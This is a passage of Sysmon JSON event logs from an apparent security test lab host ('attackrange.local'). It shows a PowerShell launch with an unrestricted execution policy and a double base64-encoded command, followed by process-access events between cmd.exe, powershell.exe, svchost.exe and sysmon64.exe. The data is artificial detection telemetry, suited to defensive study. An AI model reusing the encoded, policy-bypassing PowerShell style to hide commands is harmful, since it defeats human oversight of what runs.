GMAQQBCAHMAQQBHAGsAQQBkAEEAQgBQAEEASABBAEEAZABBAEIAcABBAEcAOABBAGIAZwBCAHoAQQBGADAAQQBPAGcAQQA2AEEARgBJAEEAWgBRAEIAdABBAEcAOABBAGQAZwBCAGwAQQBFAFUAQQBiAFEAQgB3AEEASABRAEEAZQBRAEIARgBBAEcANABBAGQAQQBCAHkAQQBHAGsAQQBaAFEAQgB6AEEAQwBrAEEAQwBnAEIASgBBAEcAWQBBAEkAQQBBAG8AQQBDADAAQQBiAGcAQgB2AEEASABRAEEASQBBAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBBAHUAQQBFAHcAQQBaAFEAQgB1AEEARwBjAEEAZABBAEIAbwBBAEMAQQBBAEwAUQBCAGwAQQBIAEUAQQBJAEEAQQB5AEEAQwBrAEEASQBBAEIANwBBAEMAQQBBAGQAQQBCAG8AQQBIAEkAQQBiAHcAQgAzAEEAQwBBAEEASQBnAEIAcABBAEcANABBAGQAZwBCAGgAQQBHAHcAQQBhAFEAQgBrAEEAQwBBAEEAYwBBAEIAaABBAEgAawBBAGIAQQBCAHYAQQBHAEUAQQBaAEEAQQBpAEEAQwBBAEEAZgBRAEEASwBBAEYATQBBAFoAUQBCADAAQQBDADAAQQBWAGcAQgBoAEEASABJAEEAYQBRAEIAaABBAEcASQBBAGIAQQBCAGwAQQBDAEEAQQBMAFEAQgBPAEEARwBFAEEAYgBRAEIAbABBAEMAQQBBAGEAZwBCAHoAQQBHADgAQQBiAGcAQgBmAEEASABJAEEAWQBRAEIAMwBBAEMAQQBBAEwAUQBCAFcAQQBHAEUAQQBiAEEAQgAxAEEARwBVAEEASQBBAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBCAGIAQQBEAEUAQQBYAFEAQQBLAEEAQwBRAEEAWgBRAEIANABBAEcAVQBBAFkAdwBCAGYAQQBIAGMAQQBjAGcAQgBoAEEASABBAEEAYwBBAEIAbABBAEgASQBBAEkAQQBBADkAQQBDAEEAQQBXAHcAQgBUAEEARwBNAEEAYwBnAEIAcABBAEgAQQBBAGQAQQBCAEMAQQBHAHcAQQBiAHcAQgBqAEEARwBzAEEAWABRAEEANgBBAEQAbwBBAFEAdwBCAHkAQQBHAFUAQQBZAFEAQgAwAEEARwBVAEEASwBBAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBCAGIAQQBEAEEAQQBYAFEAQQBwAEEAQQBvAEEASgBnAEEAawBBAEcAVQBBAGUAQQBCAGwAQQBHAE0AQQBYAHcAQgAzAEEASABJAEEAWQBRAEIAdwBBAEgAQQBBAFoAUQBCAHkAQQBBAD0APQA=","CurrentDirectory":"C:\\Users\\Administrator\\","User":"ATTACKRANGE\\Administrator","LogonGuid":"{E2A3D6B1-11D8-5F25-0000-0020C7800800}","LogonId":"0x880c7","TerminalSessionId":"0","IntegrityLevel":"High","Hashes":"MD5=097CE5761C89434367598B34FE32893B,SHA256=BA4038FD20E474C047BE8AAD5BFACDB1BFC1DDBE12F803F473B7918D8D819436,IMPHASH=CAEE994F79D85E47C06E5FA9CDEAE453","ParentProcessGuid":"{E2A3D6B1-11D8-5F25-0000-0010B9830800}","ParentProcessId":"4184","ParentImage":"C:\\Windows\\System32\\cmd.exe","ParentCommandLine":"C:\\Windows\\system32\\cmd.exe /C PowerShell -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand UABvAHcAZQByAFMAaABlAGwAbAAgAC0ATgBvAFAAcgBvAGYAaQBsAGUAIAAtAE4AbwBuAEkAbgB0AGUAcgBhAGMAdABpAHYAZQAgAC0ARQB4AGUAYwB1AHQAaQBvAG4AUABvAGwAaQBjAHkAIABVAG4AcgBlAHMAdAByAGkAYwB0AGUAZAAgAC0ARQBuAGMAbwBkAGUAZABDAG8AbQBtAGEAbgBkACAASgBnAEIAagBBAEcAZwBBAFkAdwBCAHcAQQBDADQAQQBZAHcAQgB2AEEARwAwAEEASQBBAEEAMgBBAEQAVQBBAE0AQQBBAHcAQQBEAEUAQQBJAEEAQQArAEEAQwBBAEEASgBBAEIAdQBBAEgAVQBBAGIAQQBCAHMAQQBBAG8AQQBKAEEAQgBsAEEASABnAEEAWgBRAEIAagBBAEYAOABBAGQAdwBCAHkAQQBHAEUAQQBjAEEAQgB3AEEARwBVAEEAYwBnAEIAZgBBAEgATQBBAGQAQQBCAHkAQQBDAEEAQQBQAFEAQQBnAEEAQwBRAEEAYQBRAEIAdQBBAEgAQQBBAGQAUQBCADAAQQBDAEEAQQBmAEEAQQBnAEEARQA4AEEAZABRAEIAMABBAEMAMABBAFUAdwBCADAAQQBIAEkAQQBhAFEAQgB1AEEARwBjAEEAQwBnAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBBAGcAQQBEADAAQQBJAEEAQQBrAEEARwBVAEEAZQBBAEIAbABBAEcATQBBAFgAdwBCADMAQQBIAEkAQQBZAFEAQgB3AEEASABBAEEAWgBRAEIAeQBBAEYAOABBAGMAdwBCADAAQQBIAEkAQQBMAGcAQgBUAEEASABBAEEAYgBBAEIAcABBAEgAUQBBAEsAQQBCAEEAQQBDAGcAQQBJAGcAQgBnAEEARABBAEEAWQBBAEEAdwBBAEcAQQBBAE0AQQBCAGcAQQBEAEEAQQBJAGcAQQBwAEEAQwB3AEEASQBBAEEAeQBBAEMAdwBBAEkAQQBCAGIAQQBGAE0AQQBkAEEAQgB5AEEARwBrAEEAYgBnAEIAbgBBAEYATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBQAEEASABBAEEAZABBAEIAcABBAEcAOABBAGIAZwBCAHoAQQBGADAAQQBPAGcAQQA2AEEARgBJAEEAWgBRAEIAdABBAEcAOABBAGQAZwBCAGwAQQBFAFUAQQBiAFEAQgB3AEEASABRAEEAZQBRAEIARgBBAEcANABBAGQAQQBCAHkAQQBHAGsAQQBaAFEAQgB6AEEAQwBrAEEAQwBnAEIASgBBAEcAWQBBAEkAQQBBAG8AQQBDADAAQQBiAGcAQgB2AEEASABRAEEASQBBAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBBAHUAQQBFAHcAQQBaAFEAQgB1AEEARwBjAEEAZABBAEIAbwBBAEMAQQBBAEwAUQBCAGwAQQBIAEUAQQBJAEEAQQB5AEEAQwBrAEEASQBBAEIANwBBAEMAQQBBAGQAQQBCAG8AQQBIAEkAQQBiAHcAQgAzAEEAQwBBAEEASQBnAEIAcABBAEcANABBAGQAZwBCAGgAQQBHAHcAQQBhAFEAQgBrAEEAQwBBAEEAYwBBAEIAaABBAEgAawBBAGIAQQBCAHYAQQBHAEUAQQBaAEEAQQBpAEEAQwBBAEEAZgBRAEEASwBBAEYATQBBAFoAUQBCADAAQQBDADAAQQBWAGcAQgBoAEEASABJAEEAYQBRAEIAaABBAEcASQBBAGIAQQBCAGwAQQBDAEEAQQBMAFEAQgBPAEEARwBFAEEAYgBRAEIAbABBAEMAQQBBAGEAZwBCAHoAQQBHADgAQQBiAGcAQgBmAEEASABJAEEAWQBRAEIAMwBBAEMAQQBBAEwAUQBCAFcAQQBHAEUAQQBiAEEAQgAxAEEARwBVAEEASQBBAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBCAGIAQQBEAEUAQQBYAFEAQQBLAEEAQwBRAEEAWgBRAEIANABBAEcAVQBBAFkAdwBCAGYAQQBIAGMAQQBjAGcAQgBoAEEASABBAEEAYwBBAEIAbABBAEgASQBBAEkAQQBBADkAQQBDAEEAQQBXAHcAQgBUAEEARwBNAEEAYwBnAEIAcABBAEgAQQBBAGQAQQBCAEMAQQBHAHcAQQBiAHcAQgBqAEEARwBzAEEAWABRAEEANgBBAEQAbwBBAFEAdwBCAHkAQQBHAFUAQQBZAFEAQgAwAEEARwBVAEEASwBBAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBCAGIAQQBEAEEAQQBYAFEAQQBwAEEAQQBvAEEASgBnAEEAawBBAEcAVQBBAGUAQQBCAGwAQQBHAE0AQQBYAHcAQgAzAEEASABJAEEAWQBRAEIAdwBBAEgAQQBBAFoAUQBCAHkAQQBBAD0APQA=","EventReceivedTime":"2020-08-01 06:55:21","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:20","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5862,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:20.370\r\nSourceProcessGUID: {E2A3D6B1-11BF-5F25-0000-0010226F0600}\r\nSourceProcessId: 4184\r\nSourceThreadId: 4832\r\nSourceImage: C:\\Windows\\system32\\cmd.exe\r\nTargetProcessGUID: {E2A3D6B1-11D8-5F25-0000-001071840800}\r\nTargetProcessId: 5060\r\nTargetImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\system32\\cmd.exe+f1e1|C:\\Windows\\system32\\cmd.exe+11a37|C:\\Windows\\system32\\cmd.exe+cb0d|C:\\Windows\\system32\\cmd.exe+c295|C:\\Windows\\system32\\cmd.exe+f916|C:\\Windows\\system32\\cmd.exe+1510d|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:20.370","SourceProcessGUID":"{E2A3D6B1-11BF-5F25-0000-0010226F0600}","SourceProcessId":"4184","SourceThreadId":"4832","SourceImage":"C:\\Windows\\system32\\cmd.exe","TargetProcessGUID":"{E2A3D6B1-11D8-5F25-0000-001071840800}","TargetProcessId":"5060","TargetImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\system32\\cmd.exe+f1e1|C:\\Windows\\system32\\cmd.exe+11a37|C:\\Windows\\system32\\cmd.exe+cb0d|C:\\Windows\\system32\\cmd.exe+c295|C:\\Windows\\system32\\cmd.exe+f916|C:\\Windows\\system32\\cmd.exe+1510d|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:55:21","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:20","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5863,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:20.370\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-0010E8420000}\r\nSourceProcessId: 644\r\nSourceThreadId: 1212\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {E2A3D6B1-11D8-5F25-0000-001071840800}\r\nTargetProcessId: 5060\r\nTargetImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:20.370","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-0010E8420000}","SourceProcessId":"644","SourceThreadId":"1212","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{E2A3D6B1-11D8-5F25-0000-001071840800}","TargetProcessId":"5060","TargetImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 06:55:21","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:20","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5864,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:20.370\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:20.370","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:55:21","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:20","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5865,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:20.370\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:20.370","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:55:21","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:20","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5866,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:20.370\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:20.370","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:55:21","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:20","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5867,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:20.370\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:20.370","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:55:21","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:20","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5868,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:20.370\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: 